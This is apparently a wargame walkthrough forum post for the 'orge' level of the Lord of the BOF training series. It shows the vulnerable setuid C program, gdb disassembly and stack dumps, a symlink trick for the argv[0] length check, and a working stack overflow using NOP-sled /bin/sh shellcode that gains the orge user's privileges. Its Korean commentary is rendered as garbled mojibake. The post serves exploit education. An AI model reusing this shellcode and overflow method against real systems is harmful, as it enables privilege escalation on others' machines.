|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8609 [º¹»ç]
[darkelf@localhost darkelf]$ bash2
[darkelf@localhost darkelf]$ ls -al
total 48
drwx------ 2 darkelf darkelf 4096 Mar 30 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkelf darkelf 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 darkelf darkelf 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 darkelf darkelf 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 darkelf darkelf 333 Feb 26 2010 .emacs
-rw-r--r-- 1 darkelf darkelf 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge
-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
¼Ò½º Äڵ带 catÀ¸·Î Ãâ·ÂÇÏÀÚ¸é argv[0]´Â ÆÄÀÏ À̸§À» ÀǹÌÇÑ´Ù.
ÆÄÀÏ À̸§ÀÇ ±æÀÌ°¡ 77ÀÌ ¾Æ´Ò °æ¿ì if¹®¿¡ µé¾î°¡ exitÇÔ¼öÀÇ È£Ãâ·Î
ÇÁ·Î±×·¥ÀÌ Á¾·áµÈ´Ù.
±×·¸´Ù¸é ÆÄÀÏÀÇ À̸§À» º¯°æÇØ¾ß µÇ´Âµ¥
°ø·«ÇÒ ´ë»ó ÇÁ·Î±×·¥ÀÇ ±ÇÇÑÀÌ ¾øÀ¸´Ï À̸§À» º¯°æÇÒ ¼ö ¾ø´Ù.
ÇÑ°¡Áö ¹æ¹ýÀÌ ÀÖ´Ù¸é ¸µÅ©¸¦ °É¸é µÈ´Ù.
----------------------------------------------------
½Éº¼¸¯¸µÅ© (Symbolic Link)
´Ü¼øÈ÷ ¿øº»ÆÄÀÏÀ» °¡¸®Å°µµ·Ï ¸µÅ©¸¸ ½ÃÄѵР°ÍÀ¸·Î
MSÀÇ À©µµ¿ì½Ã½ºÅÛ¿¡¼ ÈçÈ÷ »ç¿ëÇÏ´Â '¹Ù·Î°¡±â' °°Àº °ÍÀ̸ç,
¿øº»ÆÄÀÏÀ» °¡¸®Å°°í¸¸ ÀÖÀ¸¹Ç·Î ¿øº»ÆÄÀÏÀÇ Å©±â¿Í´Â ¹«°üÇÑ´Ù.
±×¸®°í ½Éº¼¸¯¸µÅ©¿¡¼´Â ¿øº»ÆÄÀÏÀÌ »èÁ¦µÇ¾î Á¸ÀçÇÏÁö ¾ÊÀ» °æ¿ì¿¡
¸µÅ©ÆÄÀÏÀº ±ô¹Ú°Å¸®¸é¼ ¸µÅ©ÆÄÀÏÀÇ ¿øº»ÆÄÀÏÀÌ ¾ø´Ù´Â °ÍÀ» ¾Ë·ÁÁØ´Ù.
----------------------------------------------------
Çϵ帵ũ (Hard Link)
¿øº»ÆÄÀÏ°ú ´Ù¸¥ À̸§À¸·Î Á¸ÀçÇÏ´Â µ¿ÀÏÇÑ ÆÄÀÏÀ̸ç
¿øº»ÆÄÀÏ°ú µ¿ÀÏÇÑ ³»¿ëÀÇ ´Ù¸¥ ÆÄÀÏÀ̶ó°í ÇÒ ¼ö ÀÖ´Ù.
±×¸®°í Çϵ帵ũ¿¡¼´Â ¿øº»ÆÄÀÏ°ú ¸µÅ©ÆÄÀÏ
µÎ°³°¡ ¼·Î ´Ù¸¥ ÆÄÀÏÀ̱⠶§¹®¿¡
µÑ Áß Çϳª¸¦ »èÁ¦ÇÏ´õ¶óµµ ³ª¸ÓÁö Çϳª´Â ±×´ë·Î ³²¾Æ ÀÖ´Ù.
¶ÇÇÑ Çϵ帵ũ¿¡¼´Â ¿øº»ÆÄÀÏÀÇ ³»¿ëÀÌ º¯°æµÉ °æ¿ì¿¡´Â
¸µÅ©ÆÄÀÏÀÇ ³»¿ë ¶ÇÇÑ ÀÚµ¿À¸·Î º¯°æµÈ´Ù.
»ç¿ë¹ý : ln [¿É¼Ç] ¿øº»ÆÄÀÏ ´ë»óÆÄÀÏ(´ë»óµð·ºÅ丮)
Ãâó: https://webdir.tistory.com/148 [WEBDIR:Ƽ½ºÅ丮]
----------------------------------------------------
[darkelf@localhost darkelf]$ mkdir tmp
[darkelf@localhost darkelf]$ ls
orge orge.c tmp
[darkelf@localhost darkelf]$ cp orge tmp
[darkelf@localhost darkelf]$ cd ls
bash2: cd: ls: No such file or directory
[darkelf@localhost darkelf]$ ls
orge orge.c tmp
[darkelf@localhost darkelf]$ cd tmp
[darkelf@localhost tmp]$ ls
orge
[darkelf@localhost tmp]$ pwd
/home/darkelf/tmp
[darkelf@localhost tmp]$ ln -s orge `python -c 'print "A"*59'`
¿©±â¼ ¿ì¸®´Â pwd¸¦ ÀÌ¿ëÇØ À§Ä¡°æ·Î¸¦ ÆľÇÇÏ°í
argv[0]ÀÇ ±æÀÌ°¡ 77ÀÌ ¼º¸³µÇ¾î¾ß
if¹®¿¡ ÁøÀÔÇÏÁö ¾Ê°í ´ÙÀ½ ÄÚµå·Î ³Ñ¾î°£´Ù.
±×·¡¼ ÃÖÁ¾ÀûÀ¸·Î ÆÄÀÏ À̸§Àº...
/home/darkelf/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
½Ã°£ÀÌ ³²¾Æµ¹°í ÇÒ ÀÏ ¾øÀ¸¸é »õ¾îºÁµµ ¹«¹æÇÏ´Ù.
77°³´Ù.
[darkelf@localhost tmp]$ ls -al
total 24
drwxrwxr-x 2 darkelf darkelf 4096 Jul 7 01:10 .
drwx------ 3 darkelf darkelf 4096 Jul 7 01:05 ..
lrwxrwxrwx 1 darkelf darkelf 4 Jul 7 01:10 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
-rwsr-sr-x 1 darkelf darkelf 12700 Jul 7 01:05 orge
[darkelf@localhost tmp]$ gdb -q `python -c 'print "A"*59'`
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048526 <main+38>: mov %edx,DWORD PTR [%eax]
0x8048528 <main+40>: push %edx
0x8048529 <main+41>: call 0x80483f0 <strlen>
0x804852e <main+46>: add %esp,4
0x8048531 <main+49>: mov %eax,%eax
0x8048533 <main+51>: cmp %eax,77
0x8048536 <main+54>: je 0x8048550 <main+80>
0x8048538 <main+56>: push 0x804869c
0x804853d <main+61>: call 0x8048410 <printf>
0x8048542 <main+66>: add %esp,4
0x8048545 <main+69>: push 0
0x8048547 <main+71>: call 0x8048420 <exit>
0x804854c <main+76>: add %esp,4
0x804854f <main+79>: nop
0x8048550 <main+80>: nop
0x8048551 <main+81>: mov DWORD PTR [%ebp-44],0x0
0x8048558 <main+88>: mov %eax,DWORD PTR [%ebp-44]
0x804855b <main+91>: lea %edx,[%eax*4]
0x8048562 <main+98>: mov %eax,%ds:0x80497d4
0x8048567 <main+103>: cmp DWORD PTR [%eax+%edx],0
0x804856b <main+107>: jne 0x8048570 <main+112>
0x804856d <main+109>: jmp 0x80485b0 <main+176>
0x804856f <main+111>: nop
0x8048570 <main+112>: mov %eax,DWORD PTR [%ebp-44]
0x8048573 <main+115>: lea %edx,[%eax*4]
0x804857a <main+122>: mov %eax,%ds:0x80497d4
0x804857f <main+127>: mov %edx,DWORD PTR [%eax+%edx]
0x8048582 <main+130>: push %edx
0x8048583 <main+131>: call 0x80483f0 <strlen>
0x8048588 <main+136>: add %esp,4
0x804858b <main+139>: mov %eax,%eax
0x804858d <main+141>: push %eax
0x804858e <main+142>: push 0
0x8048590 <main+144>: mov %eax,DWORD PTR [%ebp-44]
0x8048593 <main+147>: lea %edx,[%eax*4]
0x804859a <main+154>: mov %eax,%ds:0x80497d4
0x804859f <main+159>: mov %edx,DWORD PTR [%eax+%edx]
0x80485a2 <main+162>: push %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>: call 0x8048430 <memset>
0x80485a8 <main+168>: add %esp,12
0x80485ab <main+171>: inc DWORD PTR [%ebp-44]
0x80485ae <main+174>: jmp 0x8048558 <main+88>
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: add %edx,47
0x80485bb <main+187>: cmp BYTE PTR [%edx],0xbf
0x80485be <main+190>: je 0x80485d7 <main+215>
0x80485c0 <main+192>: push 0x80486ab
0x80485c5 <main+197>: call 0x8048410 <printf>
0x80485ca <main+202>: add %esp,4
0x80485cd <main+205>: push 0
0x80485cf <main+207>: call 0x8048420 <exit>
0x80485d4 <main+212>: add %esp,4
0x80485d7 <main+215>: mov %eax,DWORD PTR [%ebp+12]
0x80485da <main+218>: add %eax,4
0x80485dd <main+221>: mov %edx,DWORD PTR [%eax]
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0 <strlen>
0x80485e5 <main+229>: add %esp,4
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp %eax,48
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push 0x80486c8
0x80485f4 <main+244>: call 0x8048410 <printf>
0x80485f9 <main+249>: add %esp,4
0x80485fc <main+252>: push 0
0x80485fe <main+254>: call 0x8048420 <exit>
0x8048603 <main+259>: add %esp,4
0x8048606 <main+262>: mov %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>: add %eax,4
0x804860c <main+268>: mov %edx,DWORD PTR [%eax]
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea %eax,[%ebp-40]
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440 <strcpy>
0x8048618 <main+280>: add %esp,8
0x804861b <main+283>: lea %eax,[%ebp-40]
0x804861e <main+286>: push %eax
0x804861f <main+287>: push 0x80486df
0x8048624 <main+292>: call 0x8048410 <printf>
0x8048629 <main+297>: add %esp,8
0x804862c <main+300>: push 40
0x804862e <main+302>: push 0
0x8048630 <main+304>: lea %eax,[%ebp-40]
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430 <memset>
0x8048639 <main+313>: add %esp,12
0x804863c <main+316>: leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
(gdb) b *main+275
Breakpoint 1 at 0x8048613
(gdb) r `python -c 'print "B"*44+"\xbf"*4'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "B"*44+"\xbf"*4'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048613 in main ()
(gdb) x/512x $esp
0xbffff984: 0xbffff990 0xbffffb59 0x00000017 0xbffff9b8
0xbffff994: 0x4000a970 0x400f855b 0x08049704 0x4000ae60
0xbffff9a4: 0xbffffa04 0xbffff9b8 0x080484eb 0x080496f0
0xbffff9b4: 0x08049704 0xbffff9d8 0x400309cb 0x00000003
0xbffff9c4: 0xbffffa04 0xbffffa14 0x40013868 0x00000003
0xbffff9d4: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffff9e4: 0x00000003 0xbffffa04 0x08048390 0x0804866c
0xbffff9f4: 0x4000ae60 0xbffff9fc 0x40013e90 0x00000003
0xbffffa04: 0xbffffb0b 0xbffffb59 0xbffffb8a 0x00000000
0xbffffa14: 0xbffffc08 0xbffffc2a 0xbffffc34 0xbffffc42
0xbffffa24: 0xbffffc61 0xbffffc71 0xbffffc88 0xbffffca5
0xbffffa34: 0xbffffcc4 0xbffffccf 0xbffffcdd 0xbffffd20
0xbffffa44: 0xbffffd35 0xbffffd48 0xbffffd5d 0xbffffd6d
0xbffffa54: 0xbffffd7a 0xbffffd99 0xbffffdb1 0xbffffdbc
0xbffffa64: 0xbffffdcd 0xbffffde3 0xbffffdeb 0x00000000
0xbffffa74: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffa84: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffa94: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffaa4: 0x00000009 0x08048450 0x0000000b 0x000001fa
0xbffffab4: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbffffac4: 0x0000000e 0x000001fa 0x00000010 0x0febfbff
0xbffffad4: 0x0000000f 0xbffffb06 0x00000000 0x00000000
0xbffffae4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb04: 0x36690000 0x2f003638 0x656d6f68 0x7261642f
0xbffffb14: 0x666c656b 0x706d742f 0x4141412f 0x41414141
0xbffffb24: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb34: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb44: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb54: 0x41414141 0x42424200 0x42424242 0x42424242
0xbffffb64: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb74: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb84: 0xbfbfbf42 0x909000bf 0x90909090 0x90909090
0xbffffb94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xbffffbf4: 0x2f686873 0x896e6962 0x895350e3 0xb0d231e1
0xbffffc04: 0x0080cd0b 0x00000000 0x00000000 0x00000000
0xbffffc14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x682f0000 0x2f656d6f
0xbfffffb4: 0x6b726164 0x2f666c65 0x2f706d74 0x41414141
0xbfffffc4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffd4: 0x41414141 0x41414141 0x41414141 0x41414141
---Type <return> to continue, or q <return> to quit---
0xbfffffe4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffff4: 0x41414141 0x00414141 0x00000000 Cannot access memory at address 0xc0000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ pwd
/home/darkelf
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "A"*63'`
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge orge.c tmp
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*63'`
argv error
[darkelf@localhost darkelf]$ ls -al
total 52
drwx------ 3 darkelf darkelf 4096 Jul 7 01:13 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkelf darkelf 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 darkelf darkelf 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 darkelf darkelf 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 darkelf darkelf 333 Feb 26 2010 .emacs
-rw-r--r-- 1 darkelf darkelf 3394 Feb 26 2010 .screenrc
lrwxrwxrwx 1 darkelf darkelf 4 Jul 7 01:13 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge
-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge
-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c
drwxrwxr-x 2 darkelf darkelf 4096 Jul 7 01:10 tmp
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*63'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[0] error
[darkelf@localhost darkelf]$ ln -s orge `python -c 'print "A"*75'`
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
¢¥
Segmentation fault
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge orge.c tmp
[darkelf@localhost darkelf]$ cd tmp
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge
[darkelf@localhost tmp]$ ./`python -c 'print "A"*59'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[0] error
[darkelf@localhost tmp]$ ln -s orge `python -c 'prrint "A"*75'`
File "<string>", line 1
prrint "A"*75
^
SyntaxError: invalid syntax
ln: ./orge: File exists
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge
[darkelf@localhost tmp]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
bash2: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory
[darkelf@localhost tmp]$ ln -s orge `python -c 'print "B"*75'`
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB orge
[darkelf@localhost tmp]$ ./`python -c 'print "B"*75'` `python -c 'print "\x90"*44+"\xb4\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
¢¥
Segmentation fault (core dumped)
[darkelf@localhost tmp]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB core orge
[darkelf@localhost tmp]$ gdb -q -c core
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB '.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffad in ?? ()
(gdb) x/200x $esp
0xbffff970: 0x00000000 0xbffff9b4 0xbffff9c4 0x40013868
0xbffff980: 0x00000003 0x08048450 0x00000000 0x08048471
0xbffff990: 0x08048500 0x00000003 0xbffff9b4 0x08048390
0xbffff9a0: 0x0804866c 0x4000ae60 0xbffff9ac 0x40013e90
0xbffff9b0: 0x00000003 0xbffffabb 0xbffffb09 0xbffffb3a
0xbffff9c0: 0x00000000 0xbffffbb8 0xbffffbce 0xbffffbe5
0xbffff9d0: 0xbffffc04 0xbffffc26 0xbffffc33 0xbffffdf6
0xbffff9e0: 0xbffffe15 0xbffffe32 0xbffffe47 0xbffffe66
0xbffff9f0: 0xbffffe71 0xbffffe89 0xbffffe99 0xbffffea1
0xbffffa00: 0xbffffeab 0xbffffebb 0xbffffec9 0xbffffed7
0xbffffa10: 0xbffffee8 0xbffffef3 0xbfffff06 0xbfffff49
0xbffffa20: 0xbfffff99 0x00000000 0x00000003 0x08048034
0xbffffa30: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffa40: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffa50: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffa60: 0x0000000b 0x000001fa 0x0000000c 0x000001fa
0xbffffa70: 0x0000000d 0x000001fa 0x0000000e 0x000001fa
0xbffffa80: 0x00000010 0x0febfbff 0x0000000f 0xbffffab6
0xbffffa90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x36690000 0x2e003638 0x4242422f
0xbffffac0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffad0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffae0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffaf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb00: 0x42424242 0x42424242 0x90909000 0x90909090
0xbffffb10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb30: 0x90909090 0xfffbb490 0x909000bf 0x90909090
0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0xc0319090
0xbffffba0: 0x2f2f6850 0x2f686873 0x896e6962 0x895350e3
0xbffffbb0: 0xb0d231e1 0x0080cd0b 0x00000000 0x00000000
0xbffffbc0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) q
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75'` `python -c 'print "\x90"*44+"\x50\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
P
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
[??????????????]
bash$
ÃÖÁ¾ÀûÀ¸·Î...
gdb·Î µð¹ö±ëÇÒ ¶©, pwd·Î Ãâ·ÂµÈ Àý´ë°æ·Î±îÁö Æ÷ÇÔµÈ À̸§°ú
ÆÄÀÏ À̸§À» ºñ±³Çϴµ¥ gdb°¡ ¾Æ´Ñ
±×³É ½ÇÇàÇÒ °æ¿ì pwd°¡ Æ÷ÇÔÀÌ µÇÁö ¾Ê´Â´Ù. |
Hit : 1013 Date : 2025/07/07 01:43
|
1617, 
1/81 
